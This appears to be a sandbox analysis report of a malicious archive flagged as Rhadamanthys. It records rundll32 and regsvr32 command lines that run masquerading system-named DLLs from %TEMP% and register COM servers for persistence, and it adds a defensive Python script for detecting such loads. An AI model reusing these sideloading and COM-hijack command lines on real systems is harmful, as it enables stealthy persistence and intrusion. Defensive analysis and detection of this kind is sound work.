Analysis Overview
SHA256
d7587071279ebaca1fe3fc2866c62947fe6c8df9862d1c434a99b4a5fb47a611
Threat Level: Known bad
The file setup.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Blocklisted process makes network request
Registers COM server for autorun
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in Windows directory
Loads dropped DLL
Executes dropped EXE
Unsigned PE
Program crash
Modifies registry class
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of UnmapMainImage
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-29 12:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
439s
Max time network
446s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\authz.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:35
Platform
win11-20240221-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\ninput.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:34
Platform
win11-20240214-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\FXSST.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
456s
Max time network
457s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\dcntel.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.11:443 | N/A | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:34
Platform
win11-20240221-en
Max time kernel
0s
Max time network
12s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\wevtsvc.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | N/A | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240214-en
Max time kernel
453s
Max time network
459s
Command Line
Signatures
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\ = "Microsoft COM+ Services Meta Data" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\ = "Microsoft COM+ Services Meta Data" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CLSID\ = "{063B79F5-7539-11D2-9773-00A0C9B4D50C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\CLSID\ = "{063B79F5-7539-11D2-9773-00A0C9B4D50C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\ = "Microsoft COM+ Services Meta Data" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\ = "Microsoft COM+ Services Meta Data" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\CLSID\ = "{063B79F6-7539-11D2-9773-00A0C9B4D50C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\NotInsertable | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CLSID\ = "{063B79F6-7539-11D2-9773-00A0C9B4D50C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\NotInsertable | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CurVer\ = "ComPlusMetaDataServices.ServicesMetaDataReg.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CurVer\ = "ComPlusMetaDataServices.ServicesMetaDataDispenser.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7} | C:\Windows\system32\regsvr32.exe | N/A |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\authz\clbcatq.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
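Every module the sandbox ran from setup.zip carries the basename of a library that ships in System32 (authz.dll, FXSST.dll, dcntel.dll, clbcatq.dll, wevtsvc.dll, mf.dll, mspatchc.dll, ninput.dll, mlang.dll, lsasrv.dll), staged under %TEMP%, and most of them do nothing observable when rundll32 calls ordinal #1 (0s to 7s of kernel time, no signatures), which is what sideloading dependencies look like when called without their intended host. In behavioral3, regsvr32 /s on the Temp copy of clbcatq.dll creates CLSID and ProgID keys labelled "Microsoft COM+ Services Meta Data" under HKLM\Software\Classes; the report does not show the InprocServer32 default values, so it does not say where those classes now resolve. The triage a practitioner wants from process-creation telemetry is therefore: flag rundll32/regsvr32 whose module argument sits in a user-writable directory or whose basename collides with a system DLL name outside System32/SysWOW64. The following is an added example written for this page, not code from the sandbox or from the sample; the command lines are copied from the Processes sections above, the shell32.dll control line is constructed, and the system-DLL name set would in practice be generated from a clean reference image.

```python
import re
from pathlib import PureWindowsPath

# Command lines copied from this report's Processes sections, plus one constructed
# benign control (the shell32.dll line) so the triage has a negative case.
REPORT_CMDLINES = [
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\authz.dll,#1",
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\FXSST.dll,#1",
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\dcntel.dll,#1",
    r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\authz\clbcatq.dll",
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\wevtsvc.dll,#1",
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mf.dll,#1",
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mspatchc.dll,#1",
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\ninput.dll,#1",
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\mlang.dll,#1",
    r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\lsasrv.dll,#1",
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",  # constructed control
]

# Basenames of libraries that ship in %SystemRoot%\System32. Hard-coded here from the
# names in this report; a deployment would build the set from a clean reference image.
SYSTEM_DLL_NAMES = {
    "authz.dll", "fxsst.dll", "dcntel.dll", "clbcatq.dll", "wevtsvc.dll", "mf.dll",
    "mspatchc.dll", "ninput.dll", "mlang.dll", "lsasrv.dll", "shell32.dll",
}

# Directories a standard user can write to. A LOLBin hosting a module from here is
# the sideloading / masquerading pattern, not normal DLL hosting.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|programdata|windows\\temp)\\",
    re.IGNORECASE,
)
WINDOWS_DIR = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\", re.IGNORECASE)

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def _tokens(cmdline):
    """Split a command line on whitespace, keeping double-quoted paths whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def module_from_cmdline(cmdline):
    """Return (host, module_path) for a rundll32/regsvr32 command line, else None.

    rundll32 takes "<dll>,<export>"; regsvr32 takes switches (/s, /i:arg) then the DLL.
    """
    toks = _tokens(cmdline)
    if not toks:
        return None
    host = PureWindowsPath(toks[0]).stem.lower()  # "rundll32.exe" and "regsvr32" both normalise
    if host not in ("rundll32", "regsvr32"):
        return None
    for tok in toks[1:]:
        if tok.startswith(("/", "-")):
            continue  # regsvr32 switches such as /s or /i:arg
        module = tok.split(",", 1)[0] if host == "rundll32" else tok
        return host, module
    return None


def triage_cmdline(cmdline):
    """Classify one LOLBin command line; returns None for lines that are not rundll32/regsvr32."""
    parsed = module_from_cmdline(cmdline)
    if parsed is None:
        return None
    host, module = parsed
    name = PureWindowsPath(module).name.lower()
    reasons = []
    if USER_WRITABLE.match(module):
        reasons.append("module in user-writable directory")
    if name in SYSTEM_DLL_NAMES and not WINDOWS_DIR.match(module):
        reasons.append(f"system DLL name '{name}' outside System32/SysWOW64")
    if host == "regsvr32" and reasons:
        # DllRegisterServer writes HKLM/HKCU Classes keys: the COM-server persistence case.
        reasons.append("registers COM server from untrusted path (persistence)")
    return {"host": host, "module": module, "suspicious": bool(reasons), "reasons": reasons}


def triage_all(cmdlines=REPORT_CMDLINES):
    """Triage a list of command lines, dropping the ones that are not LOLBin module loads."""
    return [r for r in (triage_cmdline(c) for c in cmdlines) if r is not None]


if __name__ == "__main__":
    for r in triage_all():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['host']:9} {r['module']}  {'; '.join(r['reasons'])}")
```

On a live host the next check is the default value of InprocServer32 under each of the four CLSIDs in the table above: if it names the Temp copy rather than %SystemRoot%\System32\clbcatq.dll, any client that instantiates those classes will load the attacker's DLL.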
Analysis: behavioral6
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:35
Platform
win11-20240221-en
Max time kernel
46s
Max time network
13s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\Volume\Professional\license.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
Files
memory/5104-0-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-2-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-1-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-4-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-3-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-5-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-6-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-7-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-8-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-9-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-11-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-10-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-12-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-14-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-13-0x00007FFC47AA0000-0x00007FFC47AB0000-memory.dmp
memory/5104-15-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-18-0x00007FFC88A10000-0x00007FFC88ACD000-memory.dmp
memory/5104-17-0x00007FFC47AA0000-0x00007FFC47AB0000-memory.dmp
memory/5104-16-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-19-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-28-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-29-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-30-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:35
Platform
win11-20240221-en
Max time kernel
31s
Max time network
14s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\_Default\Professional\license.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
Files
memory/3664-1-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-0-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-2-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-3-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-4-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-5-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-6-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-7-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-8-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-9-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-10-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-11-0x00007FFCDA250000-0x00007FFCDA260000-memory.dmp
memory/3664-12-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-13-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-15-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-16-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-14-0x00007FFCDA250000-0x00007FFCDA260000-memory.dmp
memory/3664-17-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-18-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-19-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-20-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-21-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-22-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-23-0x00007FFD1B4A0000-0x00007FFD1B55D000-memory.dmp
memory/3664-24-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-33-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-34-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-35-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
451s
Max time network
452s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mf.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:35
Platform
win11-20240214-en
Max time kernel
7s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\mlang.dll,#1
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
457s
Max time network
459s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\OEM\Professional\license.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
memory/468-0-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-4-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-2-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-1-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-3-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-5-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-6-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-7-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-8-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
